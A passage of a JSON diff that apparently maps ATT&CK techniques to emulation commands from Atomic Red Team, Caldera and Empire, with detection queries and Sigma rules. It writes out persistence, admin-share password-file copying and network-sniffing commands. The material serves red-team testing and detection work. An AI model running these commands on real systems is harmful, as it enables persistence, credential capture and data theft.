"data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1037.005", + "command_list": [ + "sudo touch /Library/StartupItems/EvilStartup.plist\n" + ], + "commands": [ + { + "command": "sudo touch /Library/StartupItems/EvilStartup.plist\n", + "source": "atomics/T1037.005/T1037.005.yaml", + "name": "Atomic Red Team Test - Boot or Logon Initialization Scripts: Startup Items" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1037.005", + "display_name": "Boot or Logon Initialization Scripts: Startup Items", + "atomic_tests": [ + { + "name": "Add file to Local Library StartupItems", + "auto_generated_guid": "134627c3-75db-410e-bff8-7a920075f198", + "description": "Modify or create an file in /Library/StartupItems\n\n[Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware)\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "sudo touch /Library/StartupItems/EvilStartup.plist\n", + "cleanup_command": "sudo rm /Library/StartupItems/EvilStartup.plist\n", + "name": "sh", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1039", + "command_list": [ + "copy \\\\127.0.0.1\\C$\\#{share_file} %TEMP%\\#{local_file}", + "copy \\\\#{remote}\\C$\\Windows\\temp\\Easter_Bunny.password %TEMP%\\#{local_file}", + "copy \\\\#{remote}\\C$\\#{share_file} %TEMP%\\Easter_egg.password", + "copy-item -Path \"\\\\127.0.0.1\\C$\\#{share_file}\" -Destination \"$Env:TEMP\\#{local_file}\"", + "copy-item -Path \"\\\\#{remote}\\C$\\Windows\\temp\\Easter_Bunny.password\" -Destination \"$Env:TEMP\\#{local_file}\"", + "copy-item -Path \"\\\\#{remote}\\C$\\#{share_file}\" -Destination \"$Env:TEMP\\Easter_egg.password\"" + ], + "commands": [ + { + "command": "copy \\\\127.0.0.1\\C$\\#{share_file} %TEMP%\\#{local_file}", + "source": "atomics/T1039/T1039.yaml", + "name": "Atomic Red Team Test - Data from Network Shared Drive" + }, + { + "command": "copy \\\\#{remote}\\C$\\Windows\\temp\\Easter_Bunny.password %TEMP%\\#{local_file}", + "source": "atomics/T1039/T1039.yaml", + "name": "Atomic Red Team Test - Data from Network Shared Drive" + }, + { + "command": "copy \\\\#{remote}\\C$\\#{share_file} %TEMP%\\Easter_egg.password", + "source": "atomics/T1039/T1039.yaml", + "name": "Atomic Red Team Test - Data from Network Shared Drive" + }, + { + "command": "copy-item -Path \"\\\\127.0.0.1\\C$\\#{share_file}\" -Destination \"$Env:TEMP\\#{local_file}\"", + "source": "atomics/T1039/T1039.yaml", + "name": "Atomic Red Team Test - Data from Network Shared Drive" + }, + { + "command": "copy-item -Path \"\\\\#{remote}\\C$\\Windows\\temp\\Easter_Bunny.password\" -Destination \"$Env:TEMP\\#{local_file}\"", + "source": "atomics/T1039/T1039.yaml", + "name": "Atomic Red Team Test - Data from Network Shared Drive" + }, + { + "command": "copy-item -Path \"\\\\#{remote}\\C$\\#{share_file}\" -Destination \"$Env:TEMP\\Easter_egg.password\"", + "source": "atomics/T1039/T1039.yaml", + "name": "Atomic Red Team Test - Data from Network Shared Drive" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1039", + "display_name": "Data from Network Shared Drive", + "atomic_tests": [ + { + "name": "Copy a sensitive File over Administive share with copy", + "auto_generated_guid": "6ed67921-1774-44ba-bac6-adb51ed60660", + "description": "Copy from sensitive File from the c$ of another LAN computer with copy cmd\nhttps://twitter.com/SBousseaden/status/1211636381086339073", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote": { + "description": "Remote server name", + "type": "string", + "default": "127.0.0.1" + }, + "share_file": { + "description": "Remote Path to the file", + "type": "Path", + "default": "Windows\\temp\\Easter_Bunny.password" + }, + "local_file": { + "description": "Local name", + "type": "string", + "default": "Easter_egg.password" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Administrative share must exist on #{remote}\n", + "prereq_command": "if (Test-Path \"\\\\#{remote}\\C$\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host 'Please Enable \"C$\" share on #{remote}'\n" + }, + { + "description": "\"\\\\#{remote}\\C$\\#{share_file}\" must exist on #{remote}\n", + "prereq_command": "if (Test-Path \"\\\\#{remote}\\C$\\#{share_file}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Out-File -FilePath \"\\\\#{remote}\\C$\\#{share_file}\"\n" + } + ], + "executor": { + "command": "copy \\\\#{remote}\\C$\\#{share_file} %TEMP%\\#{local_file}", + "cleanup_command": "del \\\\#{remote}\\C$\\#{share_file}\ndel %TEMP%\\#{local_file}", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Copy a sensitive File over Administive share with Powershell", + "auto_generated_guid": "7762e120-5879-44ff-97f8-008b401b9a98", + "description": "Copy from sensitive File from the c$ of another LAN computer with powershell\nhttps://twitter.com/SBousseaden/status/1211636381086339073", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote": { + "description": "Remote server name", + "type": "string", + "default": "127.0.0.1" + }, + "share_file": { + "description": "Remote Path to the file", + "type": "Path", + "default": "Windows\\temp\\Easter_Bunny.password" + }, + "local_file": { + "description": "Local name", + "type": "string", + "default": "Easter_egg.password" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Administrative share must exist on #{remote}\n", + "prereq_command": "if (Test-Path \"\\\\#{remote}\\C$\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host 'Please Enable \"C$\" share on #{remote}'\n" + }, + { + "description": "\"\\\\#{remote}\\C$\\#{share_file}\" must exist on #{remote}\n", + "prereq_command": "if (Test-Path \"\\\\#{remote}\\C$\\#{share_file}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Out-File -FilePath \"\\\\#{remote}\\C$\\#{share_file}\"\n" + } + ], + "executor": { + "command": "copy-item -Path \"\\\\#{remote}\\C$\\#{share_file}\" -Destination \"$Env:TEMP\\#{local_file}\"", + "cleanup_command": "Remove-Item -Path \"\\\\#{remote}\\C$\\#{share_file}\"\nRemove-Item -Path \"$Env:TEMP\\#{local_file}\"", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "5140/5145", + "Share connection" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "5140/5145", + "Share connection" + ], + [ + "4663", + "File monitoring" + ], + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "network share", + "definition": "Information associated with computer resources made available from one host to other hosts on a computer network using protocols such as Server Message Protocol (SMB) and Network File System (NFS).", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "network share access", + "description": "A network share was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "network share" + }, + { + "data_source": "network share", + "definition": "Information associated with computer resources made available from one host to other hosts on a computer network using protocols such as Server Message Protocol (SMB) and Network File System (NFS).", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "network share access", + "description": "A network share was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "network share" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview", + "https://docs.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1040", + "command_list": [ + "tcpdump -c 5 -nnni ens33\ntshark -c 5 -i ens33\n", + "sudo tcpdump -c 5 -nnni en0A \nif [ -x \"$(command -v tshark)\" ]; then sudo tshark -c 5 -i en0A; fi;\n", + "\"c:\\Program Files\\Wireshark\\tshark.exe\" -i Ethernet -c 5\n", + "\"c:\\Program Files\\Wireshark\\tshark.exe\" -i #{interface} -c 5\n", + "netsh trace start capture=yes tracefile=%temp%\\trace.etl maxsize=10", + "pktmon.exe start --etw -f %TEMP%\\t1040.etl\nTIMEOUT /T 5 >nul 2>&1\npktmon.exe stop\n", + "pktmon.exe filter add -p 445\n", + "$path = \"$ENV:UserProfile\\Desktop\\pcap.etl\";\nNew-NetEventSession -Name \"PCAP\" -CaptureMode SaveToFile -LocalFilePath $path;\nAdd-NetEventProvider -Name \"Microsoft-Windows-TCPIP\" -SessionName \"PCAP\";\nStart-NetEventSession -Name \"PCAP\";\nStart-Sleep -s 60;\nStop-NetEventSession -Name \"PCAP\";\nif (Test-Path $path) {\n echo $path;\n exit 0;\n} else {\n echo \"Failed to generate PCAP file.\";\n exit 1;\n};\n", + "tcpdump -i en0 & sleep 5; kill $!\n", + "powershell/collection/packet_capture", + "python/collection/linux/sniffer", + "python/collection/osx/sniffer", + "tcpdump -c 5 -nnni #{interface}", + "tshark -c 5 -i #{interface}" + ], + "commands": [ + { + "command": "tcpdump -c 5 -nnni ens33\ntshark -c 5 -i ens33\n", + "source": "atomics/T1040/T1040.yaml", + "name": "Atomic Red Team Test - Network Sniffing" + }, + { + "command": "sudo tcpdump -c 5 -nnni en0A \nif [ -x \"$(command -v tshark)\" ]; then sudo tshark -c 5 -i en0A; fi;\n", + "source": "atomics/T1040/T1040.yaml", + "name": "Atomic Red Team Test - Network Sniffing" + }, + { + "command": "\"c:\\Program Files\\Wireshark\\tshark.exe\" -i Ethernet -c 5\n", + "source": "atomics/T1040/T1040.yaml", + "name": "Atomic Red Team Test - Network Sniffing" + }, + { + "command": "\"c:\\Program Files\\Wireshark\\tshark.exe\" -i #{interface} -c 5\n", + "source": "atomics/T1040/T1040.yaml", + "name": "Atomic Red Team Test - Network Sniffing" + }, + { + "command": "netsh trace start capture=yes tracefile=%temp%\\trace.etl maxsize=10", + "source": "atomics/T1040/T1040.yaml", + "name": "Atomic Red Team Test - Network Sniffing" + }, + { + "command": "pktmon.exe start --etw -f %TEMP%\\t1040.etl\nTIMEOUT /T 5 >nul 2>&1\npktmon.exe stop\n", + "source": "atomics/T1040/T1040.yaml", + "name": "Atomic Red Team Test - Network Sniffing" + }, + { + "command": "pktmon.exe filter add -p 445\n", + "source": "atomics/T1040/T1040.yaml", + "name": "Atomic Red Team Test - Network Sniffing" + }, + { + "command": "$path = \"$ENV:UserProfile\\Desktop\\pcap.etl\";\nNew-NetEventSession -Name \"PCAP\" -CaptureMode SaveToFile -LocalFilePath $path;\nAdd-NetEventProvider -Name \"Microsoft-Windows-TCPIP\" -SessionName \"PCAP\";\nStart-NetEventSession -Name \"PCAP\";\nStart-Sleep -s 60;\nStop-NetEventSession -Name \"PCAP\";\nif (Test-Path $path) {\n echo $path;\n exit 0;\n} else {\n echo \"Failed to generate PCAP file.\";\n exit 1;\n};\n", + "source": "data/abilities/credential-access/1b4fb81c-8090-426c-93ab-0a633e7a16a7.yml", + "name": "Perform a packet capture" + }, + { + "command": "tcpdump -i en0 & sleep 5; kill $!\n", + "source": "data/abilities/credential-access/1b4fb81c-8090-426c-93ab-0a633e7a16a7.yml", + "name": "Perform a packet capture" + }, + { + "command": "powershell/collection/packet_capture", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/linux/sniffer", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/sniffer", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "tcpdump -c 5 -nnni #{interface}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "tshark -c 5 -i #{interface}", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1040", + "display_name": "Network Sniffing", + "atomic_tests": [ + { + "name": "Packet Capture Linux", + "auto_generated_guid": "7fe741f7-b265-4951-a7c7-320889083b3e", + "description": "Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.\n\nUpon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "interface": { + "description": "Specify interface to perform PCAP on.", + "type": "String", + "default": "ens33" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Check if at least one of tcpdump or tshark is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v tcpdump)\" ] && [ ! -x \"$(command -v tshark)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" + } + ], + "executor": { + "command": "tcpdump -c 5 -nnni #{interface}\ntshark -c 5 -i #{interface}\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Packet Capture macOS", + "auto_generated_guid": "9d04efee-eff5-4240-b8d2-07792b873608", + "description": "Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.\n\nUpon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A.\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "interface": { + "description": "Specify interface to perform PCAP on.", + "type": "String", + "default": "en0A" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Check if at least one of tcpdump or tshark is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v tcpdump)\" ] && [ ! -x \"$(command -v tshark)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" + } + ], + "executor": { + "command": "sudo tcpdump -c 5 -nnni #{interface} \nif [ -x \"$(command -v tshark)\" ]; then sudo tshark -c 5 -i #{interface}; fi;\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Packet Capture Windows Command Prompt", + "auto_generated_guid": "a5b2f6a0-24b4-493e-9590-c699f75723ca", + "description": "Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark\ninstalled.\n\nUpon successful execution, tshark will execute and capture 5 packets on interface \"Ethernet\".\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "interface": { + "description": "Specify interface to perform PCAP on.", + "type": "String", + "default": "Ethernet" + }, + "wireshark_url": { + "description": "wireshark installer download URL", + "type": "Url", + "default": "https://1.eu.dl.wireshark.org/win64/Wireshark-win64-latest.exe" + }, + "tshark_path": { + "description": "path to tshark.exe", + "type": "Path", + "default": "c:\\program files\\wireshark\\tshark.exe" + }, + "npcap_url": { + "description": "npcap installed download URL", + "type": "Url", + "default": "https://nmap.org/npcap/dist/npcap-1.31.exe" + }, + "npcap_path": { + "description": "path to npcap.sys", + "type": "Path", + "default": "C:\\Program Files\\Npcap\\npcap.sys" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "tshark must be installed and in the default path of \"c:\\Program Files\\Wireshark\\Tshark.exe\".\n", + "prereq_command": "if (test-path \"#{tshark_path}\") {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest -OutFile $env:temp\\wireshark_installer.exe #{wireshark_url}\nStart-Process $env:temp\\wireshark_installer.exe /S\n" + }, + { + "description": "npcap must be installed.\n", + "prereq_command": "if (test-path \"#{npcap_path}\") {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest -OutFile $env:temp\\npcap_installer.exe #{npcap_url}\nStart-Process $env:temp\\npcap_installer.exe\n" + } + ], + "executor": { + "command": "\"c:\\Program Files\\Wireshark\\tshark.exe\" -i #{interface} -c 5\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows Internal Packet Capture", + "auto_generated_guid": "b5656f67-d67f-4de8-8e62-b5581630f528", + "description": "Uses the built-in Windows packet capture\nAfter execution you should find a file named trace.etl and trace.cab in the temp directory", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "netsh trace start capture=yes tracefile=%temp%\\trace.etl maxsize=10", + "cleanup_command": "netsh trace stop >nul 2>&1\nTIMEOUT /T 5 >nul 2>&1\ndel %temp%\\trace.etl >nul 2>&1\ndel %temp%\\trace.cab >nul 2>&1", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows Internal pktmon capture", + "auto_generated_guid": "c67ba807-f48b-446e-b955-e4928cd1bf91", + "description": "Will start a packet capture and store log file as t1040.etl.\nhttps://lolbas-project.github.io/lolbas/Binaries/Pktmon/", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "pktmon.exe start --etw -f %TEMP%\\t1040.etl\nTIMEOUT /T 5 >nul 2>&1\npktmon.exe stop\n", + "cleanup_command": "del %TEMP%\\t1040.etl", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows Internal pktmon set filter", + "auto_generated_guid": "855fb8b4-b8ab-4785-ae77-09f5df7bff55", + "description": "Select Desired ports for packet capture \nhttps://lolbas-project.github.io/lolbas/Binaries/Pktmon/", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "pktmon.exe filter add -p 445\n", + "cleanup_command": "pktmon filter remove", + "name": "command_prompt", + "elevation_required": true + } + } + ] + }, + { + "id": "1b4fb81c-8090-426c-93ab-0a633e7a16a7", + "name": "Sniff network traffic", + "description": "Perform a packet capture", + "tactic": "credential-access", + "technique": { + "attack_id": "T1040", + "name": "Network Sniffing" + }, + "privilege": "Elevated", + "platforms": { + "windows": { + "psh": { + "timeout": 80, + "command": "$path = \"$ENV:UserProfile\\Desktop\\pcap.etl\";\nNew-NetEventSession -Name \"PCAP\" -CaptureMode SaveToFile -LocalFilePath $path;\nAdd-NetEventProvider -Name \"Microsoft-Windows-TCPIP\" -SessionName \"PCAP\";\nStart-NetEventSession -Name \"PCAP\";\nStart-Sleep -s 60;\nStop-NetEventSession -Name \"PCAP\";\nif (Test-Path $path) {\n echo $path;\n exit 0;\n} else {\n echo \"Failed to generate PCAP file.\";\n exit 1;\n};\n", + "cleanup": "Remove-NetEventSession -Name \"PCAP\";\nRemove-Item $ENV:UserProfile\\Desktop\\pcap.etl;\n" + } + }, + "darwin": { + "sh": { + "command": "tcpdump -i en0 & sleep 5; kill $!\n" + } + } + } + }, + { + "Empire Module": "powershell/collection/packet_capture", + "ATT&CK Technique #1": "T1040", + "ATT&CK Technique #2": "", + "Technique": "Network Sniffing", + "Concatenate for Python Dictionary": "\"powershell/collection/packet_capture\": [\"T1040\"]," + }, + { + "Empire Module": "python/collection/linux/sniffer", + "ATT&CK Technique #1": "T1040", + "ATT&CK Technique #2": "", + "Technique": "Network Sniffing", + "Concatenate for Python Dictionary": "\"python/collection/linux/sniffer\": [\"T1040\"]," + }, + { + "Empire Module": "python/collection/osx/sniffer", + "ATT&CK Technique #1": "T1040", + "ATT&CK Technique #2": "", + "Technique": "Network Sniffing", + "Concatenate for Python Dictionary": "\"python/collection/osx/sniffer\": [\"T1040\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"tshark.exe\"or process_path contains \"windump.exe\"or process_path contains \"logman.exe\"or process_path contains \"tcpdump.exe\"or process_path contains \"wprui.exe\"or process_path contains \"wpr.exe\")", + "name": "Network Sniffing" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=syslog entered promiscuous mode | table host,message", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=syslog left promiscuous mode | table host,message", + "name": "" + } + ], + "possible_detections": [ + "/var/log/messages", + { + "title": "Network Sniffing", + "id": "f4d3748a-65d1-4806-bd23-e25728081d01", + "status": "experimental", + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.yaml" + ], + "logsource": { + "product": "linux", + "service": "auditd" + }, + "detection": { + "selection1": { + "type": "execve", + "a0": "tcpdump", + "a1": "-c", + "a3|contains": "-i" + }, + "selection2": { + "type": "execve", + "a0": "tshark", + "a1": "-c", + "a3": "-i" + }, + "condition": "selection1 or selection2" + }, + "falsepositives": [ + "Legitimate administrator or user uses network sniffing tool for legitimate reason" + ], + "level": "low", + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ] + }, + { + "title": "Capture a Network Trace with netsh.exe", + "id": "d3c3861d-c504-4c77-ba55-224ba82d0118", + "status": "experimental", + "description": "Detects capture a network trace via netsh.exe trace functionality", + "references": [ + "https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/" + ], + "author": "Kutepov Anton, oscd.community", + "date": "2019/10/24", + "tags": [ + "attack.discovery", + "attack.t1040" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine|contains|all": [ + "netsh", + "trace", + "start" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate administrator or user uses netsh.exe trace functionality for legitimate reason" + ], + "level": "medium" + }, + { + "title": "Network Sniffing", + "id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", + "status": "experimental", + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + 